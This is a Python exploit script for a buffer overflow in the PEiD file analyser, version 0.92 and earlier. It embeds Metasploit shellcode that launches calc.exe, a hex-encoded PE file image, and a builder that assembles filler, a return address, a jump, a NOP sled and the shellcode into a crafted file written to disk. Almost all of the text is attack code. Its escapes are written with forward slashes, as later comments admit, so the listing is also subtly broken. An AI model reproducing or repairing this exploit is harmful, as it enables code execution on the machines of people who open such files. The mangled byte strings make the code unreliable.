- #
- # Peid <= 0.92 PE Buffer Overflow Vulnerability
- # Vulnerability discovered by Lord Yup
- # Exploited by renzhacheng For CN version
- # renzhacheng [at] Gmail [dot] com
- # http://renzhacheng.blogspot.com
- #
- import sys
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
# Payload string exactly as it appears in this listing. The sequences are
# written with a forward slash ("/x29"), which Python does not treat as a
# hex escape, so each "/xNN" is four literal characters and len(shellcode)
# is a character count of this text rather than the 164 quoted above.
shellcode = (
    "/x29/xc9/x83/xe9/xdd/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x19"
    "/xc5/xd8/x59/x83/xeb/xfc/xe2/xf4/xe5/x2d/x9c/x59/x19/xc5/x53/x1c"
    "/x25/x4e/xa4/x5c/x61/xc4/x37/xd2/x56/xdd/x53/x06/x39/xc4/x33/x10"
    "/x92/xf1/x53/x58/xf7/xf4/x18/xc0/xb5/x41/x18/x2d/x1e/x04/x12/x54"
    "/x18/x07/x33/xad/x22/x91/xfc/x5d/x6c/x20/x53/x06/x3d/xc4/x33/x3f"
    "/x92/xc9/x93/xd2/x46/xd9/xd9/xb2/x92/xd9/x53/x58/xf2/x4c/x84/x7d"
    "/x1d/x06/xe9/x99/x7d/x4e/x98/x69/x9c/x05/xa0/x55/x92/x85/xd4/xd2"
    "/x69/xd9/x75/xd2/x71/xcd/x33/x50/x92/x45/x68/x59/x19/xc5/x53/x31"
    "/x25/x9a/xe9/xaf/x79/x93/x51/xa1/x9a/x05/xa3/x09/x71/x35/x52/x5d"
    "/x46/xad/x40/xa7/x93/xcb/x8f/xa6/xfe/xa6/xb9/x35/x7a/xeb/xbd/x21"
    "/x7c/xc5/xd8/x59")
def help_info():
    """Print the usage banner to stdout.

    The banner names the running script via ``sys.argv[0]`` and states that
    exactly one positional argument, the output file name, is expected.
    Returns ``None``. The "/n/t" sequences are kept as they appear in this
    listing (literal characters, not escapes).
    """
    usage = "Usage: /n/t%s <FileName>/n" % sys.argv[0]
    print(usage)
# First part of the file that is written out. As with `shellcode`, the
# "/xNN" sequences are literal characters in this listing, not byte escapes.
# Read as hex they appear to spell a DOS stub ("MZ", "This program cannot be
# run in DOS mode"), a "PE" header and a section table (".text", ".rdata",
# ".data") -- consistent with the "PE Buffer Overflow" note in the header,
# but the exact layout is not verified here.
exploit = ("/x4D/x5A/x90/x00/x03/x00/x00/x00/x04/x00/x00/x00/xFF/xFF/x00/x00/xB8/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xC8/x00/x00/x00"
"/x0E/x1F/xBA/x0E/x00/xB4/x09/xCD/x21/xB8/x01/x4C/xCD/x21/x54/x68/x69/x73/x20/x70/x72/x6F/x67/x72/x61/x6D/x20/x63/x61/x6E/x6E/x6F"
"/x74/x20/x62/x65/x20/x72/x75/x6E/x20/x69/x6E/x20/x44/x4F/x53/x20/x6D/x6F/x64/x65/x2E/x0D/x0D/x0A/x24/x00/x00/x00/x00/x00/x00/x00"
"/xA5/x8A/x2D/xC7/xE1/xEB/x43/x94/xE1/xEB/x43/x94/xE1/xEB/x43/x94/xBE/xC9/x48/x94/xE4/xEB/x43/x94/xE1/xEB/x42/x94/xEA/xEB/x43/x94"
"/x83/xF4/x50/x94/xE4/xEB/x43/x94/x09/xF4/x48/x94/xE3/xEB/x43/x94/x52/x69/x63/x68/xE1/xEB/x43/x94/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x50/x45/x00/x00/x4C/x01/x03/x00/x86/xE1/x38/x49/x00/x00/x00/x00/x00/x00/x00/x00/xE0/x00/x0F/x01"
"/x0B/x01/x06/x00/x00/x02/x00/x00/x00/x06/x00/x00/x00/x00/x00/x00/x72/x10/x00/x00/x00/x10/x00/x00/x00/x20/x00/x00/x00/x00/x40/x00"
"/x00/x10/x00/x00/x00/x02/x00/x00/x04/x00/x00/x00/x00/x00/x00/x00/x04/x00/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x00/x04/x00/x00"
"/x00/x00/x00/x00/x03/x00/x00/x00/x00/x00/x10/x00/x00/x10/x00/x00/x00/x00/x10/x00/x00/x10/x00/x00/x00/x00/x00/x00/x10/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x30/x20/x00/x00/x3C/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x20/x00/x00/x30/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x2E/x74/x65/x78/x74/x00/x00/x00/xFC/x01/x00/x00/x00/x10/x00/x00/x00/x02/x00/x00/x00/x04/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x20/x00/x00/x60/x2E/x72/x64/x61/x74/x61/x00/x00/x44/x01/x00/x00/x00/x20/x00/x00/x00/x02/x00/x00/x00/x06/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x40/x2E/x64/x61/x74/x61/x00/x00/x00/x3C/x02/x00/x00/x00/x30/x00/x00"
"/x00/x02/x00/x00/x00/x08/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/xC0/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x6A/x00/x68/x28/x30/x40/x00/x68/x18/x30/x40/x00/x6A/x00/xFF/x15/x24/x20/x40/x00/x68/x08/x30/x40/x00/xE8/x12/x00/x00/x00/x83/xC4"
"/x04/x33/xC0/xC3/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x55/x8B/xEC/x81/xEC/x04/x04/x00/x00/x8D/x45/x0C/x56/x50/x8D/x85"
"/xFC/xFB/xFF/xFF/xFF/x75/x08/x50/xFF/x15/x28/x20/x40/x00/x8B/xF0/x8D/x45/xFC/x6A/x00/x50/x8D/x85/xFC/xFB/xFF/xFF/x56/x50/x6A/xF5"
"/xFF/x15/x08/x20/x40/x00/x50/xFF/x15/x04/x20/x40/x00/x8B/xC6/x5E/xC9/xC3/x56/xE8/x83/x00/x00/x00/x8B/xF0/xE8/x48/x00/x00/x00/x68"
"/x04/x30/x40/x00/x68/x00/x30/x40/x00/xE8/x1F/x00/x00/x00/x6A/x00/x68/x38/x30/x40/x00/x56/xE8/x65/xFF/xFF/xFF/x83/xC4/x14/x8B/xF0"
"/xE8/x3A/x00/x00/x00/x56/xFF/x15/x0C/x20/x40/x00/x5E/x56/x8B/x74/x24/x08/x3B/x74/x24/x0C/x73/x0D/x8B/x06/x85/xC0/x74/x02/xFF/xD0"
"/x83/xC6/x04/xEB/xED/x5E/xC3/x6A/x20/x58/x6A/x04/x50/xA3/x30/x30/x40/x00/xE8/x0B/x01/x00/x00/x59/xA3/x2C/x30/x40/x00/x59/xC3/x8B"
"/x0D/x34/x30/x40/x00/x85/xC9/x74/x11/xA1/x2C/x30/x40/x00/x8D/x0C/x88/x51/x50/xE8/xB5/xFF/xFF/xFF/x59/x59/xC3/x53/x56/x33/xDB/x57"
"/x89/x1D/x38/x30/x40/x00/xFF/x15/x1C/x20/x40/x00/x8B/xF8/x57/xFF/x15/x18/x20/x40/x00/x40/x50/x53/xFF/x15/x14/x20/x40/x00/x50/xFF"
"/x15/x00/x20/x40/x00/x8B/xF0/x3B/xF3/x75/x07/x33/xC0/xE9/xAC/x00/x00/x00/x57/x56/xFF/x15/x10/x20/x40/x00/x80/x3E/x22/x75/x1A/x46"
"/x89/x35/x38/x30/x40/x00/x8A/x06/x3A/xC3/x74/x07/x3C/x22/x74/x03/x46/xEB/xF3/x38/x1E/x75/x1D/xEB/xD2/x89/x35/x38/x30/x40/x00/x8A"
"/x06/x3A/xC3/x74/x0B/x3C/x20/x74/x07/x3C/x09/x74/x03/x46/xEB/xEF/x38/x1E/x74/x03/x88/x1E/x46/x6A/x01/xB9/x3C/x30/x40/x00/x58/x8A"
"/x16/x3A/xD3/x74/x05/x80/xFA/x20/x74/x05/x80/xFA/x09/x75/x03/x46/xEB/xED/x8A/x16/x3A/xD3/x74/x46/x80/xFA/x22/x75/x17/x46/x40/x89"
"/x31/x83/xC1/x04/x89/x19/x8A/x16/x3A/xD3/x74/x23/x80/xFA/x22/x74/x1E/x46/xEB/xF2/x89/x31/x40/x83/xC1/x04/x89/x19/x8A/x16/x3A/xD3"
"/x74/x0D/x80/xFA/x20/x74/x08/x80/xFA/x09/x74/x03/x46/xEB/xED/x38/x1E/x74/x0B/x88/x1E/x46/x81/xF9/x38/x32/x40/x00/x7C/xA1/x5F/x5E"
"/x5B/xC3/x8B/x44/x24/x04/x0F/xAF/x44/x24/x08/x50/x6A/x08/xFF/x15/x14/x20/x40/x00/x50/xFF/x15/x00/x20/x40/x00/xC3/x00/x00/x00/x00"
"/xEC/x20/x00/x00/xB6/x20/x00/x00/xC2/x20/x00/x00/xD2/x20/x00/x00/xE0/x20/x00/x00/xF8/x20/x00/x00/x0A/x21/x00/x00/x16/x21/x00/x00"
"/x00/x00/x00/x00/x9C/x20/x00/x00/x36/x21/x00/x00/x00/x00/x00/x00/x90/x20/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xAA/x20/x00/x00"
"/x24/x20/x00/x00/x6C/x20/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x28/x21/x00/x00/x00/x20/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xEC/x20/x00/x00/xB6/x20/x00/x00/xC2/x20/x00/x00/xD2/x20/x00/x00/xE0/x20/x00/x00"
"/xF8/x20/x00/x00/x0A/x21/x00/x00/x16/x21/x00/x00/x00/x00/x00/x00/x9C/x20/x00/x00/x36/x21/x00/x00/x00/x00/x00/x00/xBE/x01/x4D/x65"
"/x73/x73/x61/x67/x65/x42/x6F/x78/x41")
# Assemble the middle section of the output from plain str pieces. Every
# piece is text as it appears in this listing ("/xNN" is four literal
# characters, not a byte escape), so all lengths below are character counts.
# `code_len` is whatever remains up to the 564-character mark after the
# shellcode text and the 100-character filler; if that is negative the
# str multiplication yields "" rather than raising.
code_len = 564 - (len(shellcode) + 100)
overflow1 = "/x41" * 100
overflow2 = "/x41" * code_len
overflow3 = "/x90" * 3
eip = "/x12/x45/xfa/x7f"
long_jmp = "/xe9/x0b/xfe/xff/xff"
nopsled = "/x90" * 20
# Same concatenation order as a chained `+` expression, written as a join.
pieces = (
    exploit,
    overflow1,
    shellcode,
    overflow2,
    long_jmp,
    overflow3,
    eip,
    long_jmp,
    nopsled,
    shellcode,
    overflow2,
)
exploit = "".join(pieces)
# Trailer appended after the assembled middle section. As elsewhere in this
# listing the "/xNN" sequences are literal characters. Read as hex they
# appear to contain DLL and function names ("USER32.dll", "WriteFile",
# "GetStdHandle", "ExitProcess", "KERNEL32.dll", ...) and the string
# "Hello World!", i.e. what looks like an import table and string data --
# not verified here.
exploit += (
"/x00/x55/x53/x45/x52/x33/x32/x2E/x64/x6C/x6C/x00/x00/xDF/x02/x57/x72/x69/x74/x65/x46/x69/x6C/x65/x00/x52/x01/x47/x65/x74/x53/x74"
"/x64/x48/x61/x6E/x64/x6C/x65/x00/x00/x7D/x00/x45/x78/x69/x74/x50/x72/x6F/x63/x65/x73/x73/x00/x02/x03/x6C/x73/x74/x72/x63/x70/x79"
"/x41/x00/x00/x99/x01/x48/x65/x61/x70/x41/x6C/x6C/x6F/x63/x00/x40/x01/x47/x65/x74/x50/x72/x6F/x63/x65/x73/x73/x48/x65/x61/x70/x00"
"/x00/x08/x03/x6C/x73/x74/x72/x6C/x65/x6E/x41/x00/x00/xCA/x00/x47/x65/x74/x43/x6F/x6D/x6D/x61/x6E/x64/x4C/x69/x6E/x65/x41/x00/x4B"
"/x45/x52/x4E/x45/x4C/x33/x32/x2E/x64/x6C/x6C/x00/x00/xAE/x02/x77/x76/x73/x70/x72/x69/x6E/x74/x66/x41/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x48"
"/x65/x6C/x6C/x6F/x20/x57/x6F/x72/x6C/x64/x21/x0A/x00/x00/x00/x48/x65/x6C/x6C/x6F/x20/x57/x6F/x72/x6C/x64/x21/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00")
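# Command-line entry point: expects exactly one argument, the path to write
# the assembled `exploit` string to. Exit status 0 on success, 1 otherwise.
#
# Changes from the original: the file is opened with `with` so the handle is
# closed even when write() fails (the original only closed it on success);
# the bare `except:` -- which also swallowed SystemExit and KeyboardInterrupt
# -- is narrowed to I/O errors; and the local is no longer named `file`,
# which shadowed the builtin. The print calls are written in the form that
# behaves the same under Python 2 and 3, including the "... OK" layout that
# the original produced with a trailing-comma print.
if len(sys.argv) <= 1:
    help_info()
    sys.exit(1)
elif len(sys.argv) == 2:
    out_path = sys.argv[1]
    sys.stdout.write("[+] Creating File... ")
    try:
        # Text mode, matching the str payload assembled above.
        with open(out_path, 'w') as out_file:
            out_file.write(exploit)
    except (IOError, OSError):
        print("Error!")
        sys.exit(1)
    print("OK")
    sys.exit(0)
else:
    print("Error input")
    sys.exit(1)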
PEiD <= 0.92 Buffer Overflow Exploit